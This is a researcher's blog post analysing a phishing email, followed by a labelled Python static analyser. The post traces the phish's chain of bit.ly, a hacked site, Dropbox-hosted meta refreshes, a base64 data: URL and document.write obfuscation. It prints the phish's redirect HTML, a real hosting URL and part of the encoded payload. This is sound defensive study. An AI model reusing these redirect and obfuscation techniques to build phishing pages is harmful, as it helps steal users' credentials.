An Anatomy of A Nice Phish

Nicholas Weaver
Jun 20, 2016


I fear we will never robustly stop phishing, as much because we seem to insist on training users to be phished. Even generic phishing has a tendency to work, and I just received a particularly nice one that is worth examining in detail.

First the bait:

Yes, this is a very generic and unremarkable phish. But at the same time, how many emails of this sort does one see on a regular basis that are legitimate?

There is also some amusement in how the phish is actually implemented. The link is bit.ly (naturally), which redirects to a .php script on a (presumably hacked) real estate web site. But what that link returns is interesting:

<html><head><META HTTP-EQUIV="Refresh" CONTENT="1;URL=https://dl.dropboxusercontent.com/s/pziendhh708cx0z/akomesh-000001-0000.html?dl=0"></head><p><p>

</head></body></html>

Yes, it loads the actual phishing page from Dropbox! And instead of just rendering the page, this bit (conveniently hosted on Dropbox) hides itself by doing yet another meta refresh, so that the content is actually in the URL bar!

<meta http-equiv="Refresh" content="0; url= data:text/html;charset=utf-8;base64,PFNjcmlwdCBMYW5ndWFnZT0nSmF2YXNjcmlwdCc+DQo8IS0tIEhUTUwgRW5jcnlwdGlvbiBwcm92
aWRlZCBieSBpV0VCVE9PTC5jb20gLS0+DQo8IS0tDQpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgn…

And of course, the content itself is obfuscated Javascript, which does yet another document.write and decodes to HTML. The resulting page also fetches another script, this time from https://googledrive.com/host/0B5MfJSZPi35ebDRYeHVEQ1JlTVk (which appears to be a standard Javascript form validator; you don’t want people putting in bogus answers to your phish), and then posts the results to Yet Another (presumably compromised) server, which is a “powered by VESTA” landing page.

The phishing itself actually goes to a second page where it wants the phone number, before redirecting to Dropbox itself.
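The redirect-and-decode chain above is exactly what a static analyser has to peel to find the credential sink. The following Python is an added example, not code from the post: it unwraps meta refresh, base64 data: URL and document.write(unescape()) layers, stops when it hits an external hop that would require a fetch, and reports the form action and script sources of the decoded page. The sample input is constructed by re-applying the same layers; the hostnames are placeholders, not the phish’s real ones.

```python
import base64
import re
import urllib.parse

META_REFRESH = re.compile(r'<meta\s+http-equiv=["\']?refresh["\']?\s+content=["\']?\s*\d+\s*;\s*url\s*=\s*([^"\'>]+)', re.I)
DATA_URL = re.compile(r'data:text/html(?:;charset=[^;,]+)?;base64,([A-Za-z0-9+/=\s]+)', re.I)
DOC_WRITE = re.compile(r"document\.write\(unescape\('([^']*)'\)\)", re.I)
FORM_ACTION = re.compile(r'<form[^>]*\baction=["\']?([^"\'>\s]+)', re.I)
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc=["\']?([^"\'>\s]+)', re.I)

def peel(html, max_layers=8):
    """Statically unwrap the layers; returns (layers, final_html).
    Stops at a meta refresh to an external URL (the bit.ly / hacked-site / Dropbox hops),
    which cannot be resolved without fetching: final_html is then None."""
    layers, cur = [], html
    for _ in range(max_layers):
        m = META_REFRESH.search(cur)
        if m:
            target = m.group(1).strip()
            d = DATA_URL.match(target)
            if not d:
                layers.append(('redirect', target))
                return layers, None
            layers.append(('data-url', target[:30] + '...'))
            cur = base64.b64decode(''.join(d.group(1).split())).decode('utf-8', 'replace')
            continue
        w = DOC_WRITE.search(cur)
        if w:  # the "HTML encryption" layer: %XX-escaped markup written into the page
            layers.append(('document.write', None))
            cur = urllib.parse.unquote(w.group(1))
            continue
        return layers, cur
    return layers, cur

def indicators(final_html):
    """Where the decoded form posts credentials and which extra scripts it loads."""
    return {'form_actions': FORM_ACTION.findall(final_html),
            'script_srcs': SCRIPT_SRC.findall(final_html)}

# Constructed sample built by re-applying the same layers; hosts are placeholders, not the real phish.
INNER = ('<html><head><script src="https://drive.example/host/validator.js"></script></head>'
         '<body><form action="https://compromised.example/post.php" method="post">'
         '<input name="email"><input name="password" type="password"></form></body></html>')
JS = "<script>document.write(unescape('%s'))</script>" % urllib.parse.quote(INNER, safe='')
DROPBOX_HTML = '<meta http-equiv="Refresh" content="0; url= data:text/html;charset=utf-8;base64,%s">' % (
    base64.b64encode(JS.encode()).decode())
PHP_HTML = '<html><head><META HTTP-EQUIV="Refresh" CONTENT="1;URL=https://dl.dropboxusercontent.example/s/x/a.html"></head></html>'
```

Running peel(PHP_HTML) stops at the external Dropbox hop, while peel(DROPBOX_HTML) walks the data: URL and document.write layers down to the form that indicators() inspects.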

Some overall thoughts

1: We’ve trained people to be phished. The bait email looks remarkably similar to what Dropbox sends to people for legitimate purposes, and with a little bit of social graph mining you too can make fake Dropbox emails that really look like the real thing.

2: Dropbox can get an idea of how successful this phish is, at least in terms of page views, since the phishers hosted the Dropbox phish on Dropbox!

3: Anti-spam techniques may be working (mostly) in terms of preventing “unauthorized” sending. It looks like this was through a compromised account rather than created from whole cloth.

4: So many layers of obfuscation! The phishing email itself was base-64 encoded rather than plaintext. The phishing page was URL shortened, redirected to a compromised site, redirected to Dropbox, redirected to a “page” in the URL bar, which used document.write to decode base-64 encoded Javascript into the page. Just about anything short of an actual browser will be unable to extract the semantics.

5: Did I mention how much we’ve trained users to be phished? Look at this legitimate email:

How is a typical user supposed to know this is legitimate? The last 4 digits of a credit card number? How long until a criminal service offers that data (if they haven’t already)? And this business about “Email security zone”? It’s not like DKIM validated…

Authentication-Results: maihub.ICSI.Berkeley.EDU (amavisd-new); dkim=softfail
(fail, message has been altered) header.i=@info.citibank.com
Authentication-Results: maihub.ICSI.Berkeley.EDU (amavisd-new);
domainkeys=softfail (fail, message has been altered)
header.from=citicards@info.citibank.com

Yeup, that checks out…


Nicholas Weaver

Researcher: International Computer Science Institute & Lecturer @ UC Berkeley